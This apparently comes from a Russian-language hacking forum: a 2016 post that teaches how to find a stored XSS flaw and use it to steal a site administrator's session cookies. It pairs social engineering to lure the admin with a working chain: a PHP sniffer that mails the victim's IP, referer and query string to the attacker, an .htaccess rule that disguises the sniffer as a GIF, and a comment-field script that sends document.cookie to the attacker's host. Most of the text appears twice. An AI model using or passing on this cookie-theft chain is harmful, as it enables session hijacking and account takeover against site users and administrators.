- 303
- 484
- 7 Июн 2016
Для того, чтобы найти XSS на сайте, нужно вводить даный яваскрипт код во всех доступных формах для ввода на сайте: <script>alert(hacked)</script>
Увидите что выскочило окошко hacked,значит уязвимость на данном сайте присутствует.
XSS уязвимости бывают 2х видов, пассивные и активные. Мы рассмотрим оба вида уязвимости.
Активная уязвимость не требует каких либо действи со стороны пользователя которого вы хотите взломать. Пример активной XSS: Есть сайт знакомств допустим, на этом сайте есть возможность менять свои данные, если при вводе вышеупомянутого javascript кода в строку «Имя» например, выскочит окошко, то это активная XSS. Допустим вы хотите получить Куки админа, используя методы СИ(Социальной инжинерии) вы заставляете админа перейти на вашу страницу где указано ваше имя. Админ переходит и его куки оказываются у нас Если на сайте есть возможность писать комментарии, допустим под какой-либо новостью, то получить куки админа и многих других пользователей сайта, вообще не составит труда, так как ваше имя отображается в комменте который вы оставили.
Активная XSS, практика:
Допустим мы нашли активну xss в строке «комментарий», каком-то блоге где есть возможность комментирования статей. В первую очередь нужно создать сниффер, для этого создаем php файл sniff.php с таким кодом и заливаем его на наш хостинг:
Далее берем любую маленькую gifку, называем ее image.gif и добавляем в файл .htaccess такие параметры:
Теперь пишем в строку «Комментарий» такой код:
Осталось только подождать пока админ зайдет на страницу и его куки придут вам на мыло)
Увидите что выскочило окошко hacked,значит уязвимость на данном сайте присутствует.
XSS уязвимости бывают 2х видов, пассивные и активные. Мы рассмотрим оба вида уязвимости.
Активная уязвимость не требует каких либо действи со стороны пользователя которого вы хотите взломать. Пример активной XSS: Есть сайт знакомств допустим, на этом сайте есть возможность менять свои данные, если при вводе вышеупомянутого javascript кода в строку «Имя» например, выскочит окошко, то это активная XSS. Допустим вы хотите получить Куки админа, используя методы СИ(Социальной инжинерии) вы заставляете админа перейти на вашу страницу где указано ваше имя. Админ переходит и его куки оказываются у нас Если на сайте есть возможность писать комментарии, допустим под какой-либо новостью, то получить куки админа и многих других пользователей сайта, вообще не составит труда, так как ваше имя отображается в комменте который вы оставили.
Активная XSS, практика:
Допустим мы нашли активну xss в строке «комментарий», каком-то блоге где есть возможность комментирования статей. В первую очередь нужно создать сниффер, для этого создаем php файл sniff.php с таким кодом и заливаем его на наш хостинг:
PHP:
<?php
$ip=UrlDecode(getenv('REMOTE_ADDR'));
$referer=UrlDecode(getenv('HTTP_REFERER'));
$query=UrlDecode(getenv('QUERY_STRING'));
mail("[email protected]","Cookie","IP: $ip\n Adress:referer\n Query: $query");
?>
Далее берем любую маленькую gifку, называем ее image.gif и добавляем в файл .htaccess такие параметры:
Код:
RewriteEngine On
RewriteRule image.gif sniff.php
Теперь пишем в строку «Комментарий» такой код:
HTML:
<script>img = new Image(); img.src = "http://vash-site.ru/image.gif?"+document.cookie;</script>
Осталось только подождать пока админ зайдет на страницу и его куки придут вам на мыло)
Последнее редактирование модератором: